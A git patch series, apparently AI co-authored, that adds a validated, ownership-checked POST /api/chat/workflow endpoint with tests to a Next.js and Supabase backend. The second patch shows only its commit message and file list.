From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 09:24:00 -0500
Subject: [PATCH 1/5] feat(chat-workflow): POST /api/chat/workflow route stub
 (PR 2 of 5) (#579)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f650) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/api/chat/workflow/route.ts                |  34 ++++
 .../handleChatWorkflowStream.test.ts          | 165 ++++++++++++++++++
 .../__tests__/validateChatWorkflow.test.ts    | 142 +++++++++++++++
 lib/chat/handleChatWorkflowStream.ts          |  61 +++++++
 lib/chat/validateChatWorkflow.ts              |  61 +++++++
 5 files changed, 463 insertions(+)
 create mode 100644 app/api/chat/workflow/route.ts
 create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts
 create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts
 create mode 100644 lib/chat/handleChatWorkflowStream.ts
 create mode 100644 lib/chat/validateChatWorkflow.ts
diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts
new file mode 100644
index 000000000..19445c03b
--- /dev/null
+++ b/app/api/chat/workflow/route.ts
@@ -0,0 +1,34 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+
+export const maxDuration = 800;
+
+/**
+ * OPTIONS handler for CORS preflight requests.
+ *
+ * @returns A NextResponse with CORS headers.
+ */
+export async function OPTIONS() {
+  return new NextResponse(null, {
+    status: 200,
+    headers: getCorsHeaders(),
+  });
+}
+
+/**
+ * POST /api/chat/workflow
+ *
+ * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing
+ * session + chat. Currently returns a hardcoded UIMessage stream stub —
+ * the workflow is wired up in a follow-up PR.
+ *
+ * Contract: https://developers.recoupable.com/api-reference/chat/workflow
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function POST(request: NextRequest): Promise<Response> {
+  return handleChatWorkflowStream(request);
+}
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
new file mode 100644
index 000000000..c61911be8
--- /dev/null
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -0,0 +1,165 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({
+  validateChatWorkflow: vi.fn(),
+}));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
+  selectSessions: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({
+  selectChats: vi.fn(),
+}));
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({
+  isSandboxActive: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+
+function makeRequest(): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "test-key", "content-type": "application/json" },
+    body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }),
+  });
+}
+
+function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+  vi.mocked(validateChatWorkflow).mockResolvedValue({
+    messages: [],
+    chatId: CHAT_ID,
+    sessionId: SESSION_ID,
+    accountId: overrides.accountId ?? ACCOUNT_ID,
+    orgId: null,
+    authToken: "test-key",
+  });
+}
+
+function mockOwnedSessionWithActiveSandbox() {
+  mockValidatedRequest();
+  vi.mocked(selectSessions).mockResolvedValue([
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+  ]);
+  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
+  vi.mocked(isSandboxActive).mockReturnValue(true);
+}
+
+describe("handleChatWorkflowStream (stub)", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  describe("validation short-circuits", () => {
+    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(401);
+    });
+
+    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
+      const badBody = NextResponse.json(
+        { status: "error", error: "Invalid JSON body" },
+        { status: 400 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+    });
+  });
+
+  describe("session / chat ownership", () => {
+    beforeEach(() => mockValidatedRequest());
+
+    it("returns 404 when the session does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 500 when selectSessions errors (returns null)", async () => {
+      vi.mocked(selectSessions).mockResolvedValue(null);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+    });
+
+    it("returns 403 when the session is owned by a different account", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(403);
+    });
+
+    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(false);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+      const body = await res.json();
+      expect(body.error).toMatch(/sandbox/i);
+    });
+
+    it("returns 404 when the chat does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 404 when chat exists but belongs to a different session", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([
+        { id: CHAT_ID, session_id: "different-session" } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+  });
+
+  describe("success (stub response)", () => {
+    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+
+    it("returns 200 with text/event-stream content type", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+    });
+
+    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const runId = res.headers.get("x-workflow-run-id");
+      expect(runId).toBeTruthy();
+      expect(runId!.startsWith("stub-")).toBe(true);
+    });
+
+    it("emits a stream body that includes the stub assistant text", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const text = await res.text();
+      expect(text).toContain("Hello from /api/chat/workflow");
+    });
+  });
+});
diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts
new file mode 100644
index 000000000..8eb9457c2
--- /dev/null
+++ b/lib/chat/__tests__/validateChatWorkflow.test.ts
@@ -0,0 +1,142 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+
+vi.mock("@/lib/auth/validateAuthContext", () => ({
+  validateAuthContext: vi.fn(),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+
+const validBody = {
+  messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }],
+  chatId: CHAT_ID,
+  sessionId: SESSION_ID,
+};
+
+function makeRequest(body: unknown = validBody): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "k", "content-type": "application/json" },
+    body: typeof body === "string" ? body : JSON.stringify(body),
+  });
+}
+
+function mockAuthOk() {
+  vi.mocked(validateAuthContext).mockResolvedValue({
+    accountId: ACCOUNT_ID,
+    orgId: null,
+    authToken: "k",
+  });
+}
+
+describe("validateChatWorkflow", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  describe("valid input", () => {
+    beforeEach(() => mockAuthOk());
+
+    it("returns the validated body augmented with accountId / orgId / authToken", async () => {
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.chatId).toBe(CHAT_ID);
+      expect(result.sessionId).toBe(SESSION_ID);
+      expect(result.messages).toEqual(validBody.messages);
+      expect(result.accountId).toBe(ACCOUNT_ID);
+      expect(result.orgId).toBe(null);
+      expect(result.authToken).toBe("k");
+    });
+
+    it("accepts an optional context.contextLimit integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: 50 } }),
+      );
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.context?.contextLimit).toBe(50);
+    });
+
+    it("accepts an empty messages array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] }));
+      expect(result).not.toBeInstanceOf(NextResponse);
+    });
+  });
+
+  describe("invalid body", () => {
+    it("returns 400 when JSON is malformed", async () => {
+      const req = new NextRequest("http://localhost/api/chat/workflow", {
+        method: "POST",
+        headers: { "x-api-key": "k", "content-type": "application/json" },
+        body: "{not-json",
+      });
+      const result = await validateChatWorkflow(req);
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is missing", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when sessionId is missing", async () => {
+      const { sessionId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when messages is not an array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is empty string", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when context.contextLimit is not an integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: "fifty" } }),
+      );
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("does not call validateAuthContext when body validation fails", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      await validateChatWorkflow(makeRequest(rest));
+      expect(validateAuthContext).not.toHaveBeenCalled();
+    });
+  });
+
+  describe("auth", () => {
+    it("returns the auth short-circuit response when validateAuthContext rejects", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateAuthContext).mockResolvedValue(authError);
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(401);
+    });
+  });
+});
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
new file mode 100644
index 000000000..137f699cb
--- /dev/null
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -0,0 +1,61 @@
+import { NextRequest, NextResponse } from "next/server";
+import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import generateUUID from "@/lib/uuid/generateUUID";
+
+/**
+ * Handles POST /api/chat/workflow.
+ *
+ * Stub implementation: delegates auth + body validation to validateChatWorkflow,
+ * verifies ownership of the referenced session + chat, confirms the session's
+ * sandbox is active, then returns a hardcoded UIMessage stream with an
+ * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
+ * the agent loop is wired up in a follow-up PR — this stub exists so clients
+ * can integrate against the contract documented at
+ * /api-reference/chat/workflow.
+ *
+ * @param request - The incoming NextRequest
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
+  const validated = await validateChatWorkflow(request);
+  if (validated instanceof NextResponse) return validated;
+
+  const sessions = await selectSessions({ id: validated.sessionId });
+  if (sessions === null) return errorResponse("Internal server error", 500);
+  const session = sessions[0];
+  if (!session) return errorResponse("Session not found", 404);
+  if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
+  if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
+
+  const chats = await selectChats({ id: validated.chatId });
+  const chat = chats[0];
+  if (!chat || chat.session_id !== validated.sessionId) {
+    return errorResponse("Chat not found", 404);
+  }
+
+  const runId = `stub-${generateUUID()}`;
+
+  const stream = createUIMessageStream({
+    generateId: generateUUID,
+    execute: ({ writer }) => {
+      const id = generateUUID();
+      writer.write({ type: "text-start", id });
+      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
+      writer.write({ type: "text-end", id });
+    },
+  });
+
+  return createUIMessageStreamResponse({
+    stream,
+    headers: {
+      ...getCorsHeaders(),
+      "x-workflow-run-id": runId,
+    },
+  });
+}
diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts
new file mode 100644
index 000000000..4fd8e6c66
--- /dev/null
+++ b/lib/chat/validateChatWorkflow.ts
@@ -0,0 +1,61 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { z } from "zod";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { validationErrorResponse } from "@/lib/zod/validationErrorResponse";
+
+export const chatWorkflowBodySchema = z.object({
+  messages: z.array(z.any()),
+  chatId: z.string().min(1, "chatId is required"),
+  sessionId: z.string().min(1, "sessionId is required"),
+  context: z
+    .object({
+      contextLimit: z.number().int("contextLimit must be an integer"),
+    })
+    .optional(),
+});
+
+export type ChatWorkflowBody = z.infer<typeof chatWorkflowBodySchema>;
+
+export type ChatWorkflowRequest = ChatWorkflowBody & {
+  accountId: string;
+  orgId: string | null;
+  authToken?: string;
+};
+
+/**
+ * Validates a POST /api/chat/workflow request end-to-end: parses the JSON
+ * body, validates it against the schema, and runs auth via
+ * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403)
+ * or the typed body augmented with the authenticated accountId / orgId / token.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A NextResponse error or the validated, auth-augmented request.
+ */
+export async function validateChatWorkflow(
+  request: NextRequest,
+): Promise<NextResponse | ChatWorkflowRequest> {
+  let rawBody: unknown;
+  try {
+    rawBody = await request.json();
+  } catch {
+    return errorResponse("Invalid JSON body", 400);
+  }
+
+  const parsed = chatWorkflowBodySchema.safeParse(rawBody);
+  if (!parsed.success) {
+    const firstError = parsed.error.issues[0];
+    return validationErrorResponse(firstError.message, firstError.path);
+  }
+
+  const auth = await validateAuthContext(request);
+  if (auth instanceof NextResponse) return auth;
+
+  return {
+    ...parsed.data,
+    accountId: auth.accountId,
+    orgId: auth.orgId,
+    authToken: auth.authToken,
+  };
+}

From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 12:07:35 -0500
Subject: [PATCH 2/5] feat(chat-workflow): wire POST /api/chat/workflow to
 durable Vercel Workflow (PR 3 of 4) (#581)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  55 ++++
 app/lib/workflows/runAgentWorkflow.ts         |  56 ++++
 .../compareAndSetChatActiveStreamId.test.ts   |  51 +++
 .../handleChatWorkflowStream.test.ts          | 301 ++++++++++++++----
 .../__tests__/maybeResumeChatStream.test.ts   |  46 +++
 .../persistLatestUserMessage.test.ts          | 129 ++++++++
 .../reconcileExistingActiveStream.test.ts     |  92 ++++++
 lib/chat/agentCustomInstructions.ts           |   9 +
 lib/chat/assistantFileLinks.ts                |  28 ++
 lib/chat/compareAndSetChatActiveStreamId.ts   |  49 +++
 lib/chat/handleChatWorkflowStream.ts          | 100 ++++--
 lib/chat/maybeResumeChatStream.ts             |  40 +++
 lib/chat/persistLatestUserMessage.ts          |  84 +++++
 lib/chat/reconcileExistingActiveStream.ts     |  56 ++++
 lib/chat/recoupApiSkillPrompt.ts              |  11 +
 lib/recoupable/__tests__/extractOrgId.test.ts |  57 ++++
 lib/recoupable/extractOrgId.ts                |  31 ++
 .../__tests__/selectChatMessages.test.ts      |  58 ++++
 .../__tests__/upsertChatMessage.test.ts       |  46 +++
 .../chat_messages/selectChatMessages.ts       |  40 +++
 .../chat_messages/upsertChatMessage.ts        |  37 +++
 .../chats/__tests__/updateChat.test.ts        | 110 +++++++
 lib/supabase/chats/updateChat.ts              |  86 +++++
 23 files changed, 1478 insertions(+), 94 deletions(-)
 create mode 100644 app/lib/workflows/runAgentStep.ts
 create mode 100644 app/lib/workflows/runAgentWorkflow.ts
 create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
 create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts
 create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts
 create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts
 create mode 100644 lib/chat/agentCustomInstructions.ts
 create mode 100644 lib/chat/assistantFileLinks.ts
 create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts
 create mode 100644 lib/chat/maybeResumeChatStream.ts
 create mode 100644 lib/chat/persistLatestUserMessage.ts
 create mode 100644 lib/chat/reconcileExistingActiveStream.ts
 create mode 100644 lib/chat/recoupApiSkillPrompt.ts
 create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts
 create mode 100644 lib/recoupable/extractOrgId.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
 create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts
 create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts
